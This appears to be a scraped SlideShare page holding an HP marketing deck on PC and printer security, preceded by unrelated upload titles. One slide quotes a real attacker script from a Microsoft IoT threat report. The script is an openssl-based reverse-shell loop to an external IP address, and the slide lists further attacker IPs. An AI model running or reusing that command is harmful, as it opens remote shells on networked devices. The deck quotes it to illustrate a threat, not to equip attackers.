apa-style-referencing-visual-guide-2025.pdfapa-style-referencing-visual-guide-2025.pdf
apa-style-referencing-visual-guide-2025.pdf
Ishika Ghosh
 
Grade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable WorksheetGrade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable Worksheet
Sritoma Majumder
 
"Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules""Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules"
rupalinirmalbpharm
 
Real GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for SuccessReal GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for Success
Mark Soia
 
Understanding P–N Junction Semiconductors: A Beginner’s Guide
Understanding P–N Junction Semiconductors: A Beginner’s GuideUnderstanding P–N Junction Semiconductors: A Beginner’s Guide
Understanding P–N Junction Semiconductors: A Beginner’s Guide
GS Virdi
 
SCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptx
SCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptxSCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptx
SCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptx
Ronisha Das
 
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
larencebapu132
 
BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...
BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...
BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...
Nguyen Thanh Tu Collection
 
How to Manage Purchase Alternatives in Odoo 18
How to Manage Purchase Alternatives in Odoo 18How to Manage Purchase Alternatives in Odoo 18
How to Manage Purchase Alternatives in Odoo 18
Celine George
 
Odoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo SlidesOdoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo Slides
Celine George
 
CBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - Worksheet
CBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - WorksheetCBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - Worksheet
CBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - Worksheet
Sritoma Majumder
 
03#UNTAGGED. Generosity in architecture.
03#UNTAGGED. Generosity in architecture.03#UNTAGGED. Generosity in architecture.
03#UNTAGGED. Generosity in architecture.
MCH
 
To study Digestive system of insect.pptx
To study Digestive system of insect.pptxTo study Digestive system of insect.pptx
To study Digestive system of insect.pptx
Arshad Shaikh
 

08 Transform Endpoint Security with the World’s Most Secure PCs and Printers

  • 1. c04912106, May 2019, Rev. 141 Transform Endpoint Security with the World’s Most Secure PCs and Printers Jacky Cheung Market Development Manager Jan 13, 2020
  • 2. Get the world’s most secure PCs and Printers PROXY & FIREWALL CONTROLS (SITE CATEGORIZATION, SSL INSPECTION, CONTENT ANALYSIS) CLOUD CONTROLS (CASB, CLOUD AV) NETWORK CONTROLS (NETWORK AV, SANDBOXING, SECURITY ANALYTICS) HOST CONTROLS (ENDPOINT AV, APPLICATION WHITELISTING, EDR) ON THE ENDPOINT ON THE NETWORK ENTERING THE NETWORK OUTSIDE THE NETWORK HP PCs and Printers are engineered with hardened security features to protect and recover from cyberattacks before they become headlines. Where we Play Last line of Defense
  • 3. Firmware and software Email Hardware Internet Network access • Print infrastructure is now viewed as one of the top security risks by organizations* Today’s printers act a whole lot like PCs c04912106, March 2019, Rev. 13
  • 4. Perceived Level of Security Risk Page 5: Printer Security : The New IT Imperative, Research Shows That the “Humble Printer”, Remains a Security Blind Spot4
  • 5. MFP Security Vulnerabilities Page 7, Global Print Security Landscape, 2019 , Quocirca5
  • 6. Microsoft’s Threat Intelligence Report – August 2019 c04912106, May 2019, Rev. 146 IoT Devices ( Printers, VOIP Phone, DVRs) are being used as entry points into the corporate networks #!/bin/sh export [IOT Device] ="-qws-display :1 -nomouse" echo 1|tee /tmp/.c;sh-c '(until (sh-c "openssls_client-quiet -host 167.114.153.55 -port 443 |while : ; do sh&& break; done| openssls_client-quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee/tmp.c&& if [ $cn-ge30 ]; then (rm /tmp/.c;pkill-f 'openssl'); fi);done)&' & --end contents of file— • 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251, 128.199.199.187 • https://msrc- blog.microsoft.com/2019/08/05/corporate-iot-a-path- to-intrusion
  • 7. c04912106, May 2019, Rev. 147  IT Asset Management  Custom security policy  Anti-Malware / OS Security  Patching  Hardening, Secure Configuration  Network security (802.1x, Internet Exposure etc)  Reports (Audits, Compliance reports)  3rdParty contracts Call to Action -Recommendations from Microsoft and OEMs
  • 8. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps.  Monitors outbound network connections (packets)  Detects anomalous network behavior  Learns what’s normal, then inspects and stops suspicious packets  User-defined DNS whitelist  Monitors DNS activity to detect attempts to contact Command & Control server  Triggers a reboot to initiate self-healing procedures without IT intervention  Creates security events that can be integrated with a SIEM, Anti-malware technology in HP Printers / MFDs
  • 9. HP Printer / MFD Security Dashboard 9
  • 10. HP SURE START1 HP SURE RUN2 HP SURE RECOVER3 HP SURE CLICK4 HP SURE VIEW5 The world’s first SELF-HEALING BIOS Others can detect, but HP Sure Start can RECOVER! Built-in HARDWARE- ENFORCED RUNTIME PERSISTENCE for your PC's key security processes SECURE AND AUTOMATED RECOVERY on the world’s first and only PCs with a firmware-embedded self-healing system image28 SECURE WEB BROWSING to protect against most common attack methods and attachment viewing Protect against INTEGRATED PRIVACY SCREEN6 UNIQUE HARDWARE - UNMATCHED PROTECTION HARDWARE-ENFORCED RESILIENCE AGAINST… BIOS Rootkits like LoJax Viruses that take down OS defenses like H1N1 Wiper attacks like NotPetya Web-borne or Office malware like WannaCry Shoulder surfing and Visual Hacking
  • 11. HP Proactive Security plans 11 DaaS Proactive Security features √ Real-time malware threat protection: • Email attachment protection • Phishing link protection • Download protection • Corporate website whitelisting support for IT √ HP TechPulse reporting and analytics: • Protection status and gaps by time • Most impacted users and devices by prevented threats • Threats by type and source (summary/details), and over time Standard Self- Managed Enhanced HP- Managed √ √ HP-managed service: • Analysis of threats by Service Experts⁴ • Detailed, malware kill chain analysis²⁷ • Enforcement of isolation protection on endpoints √ Purchasers of HP DaaS Proactive Security¹ in the U.S receive the Aon CyQu self-assessment and security score. $0 retainer and one-hour consultation included with optional incident response services from Aon. HP onboarding service representatives will provide instructions.
  • 12. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps. Case Study Sydney TAFE closes security gaps across 1,000 – strong print estate Challenge With printers/MFPs becoming increasingly connected to the network, there are risks to students’ personal information and confidential staff information being leaked The Australian Department of Defense identified printers and MFPs as a potential source of cybersecurity incidents Solution HP delivered a Print Security Advisory Service. A three- day risk assessment The workshop helps discover security blind spots and inefficiencies across Sydney TAFE’s printing and imaging fleet The workshop educated key stakeholders on threats and helping Sydney TAFE reach consensus on the goals of a new printing security strategy
  • 13. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps. Key Take Away
  • 14. c04912106, May 2019, Rev. 1414 Should you have any further Questions, please feel free to Contact : Jacky Cheung Market Development Manager HP Inc Hong Kong Limited TEL : 852 60740307 Email : [email protected] THANK YOU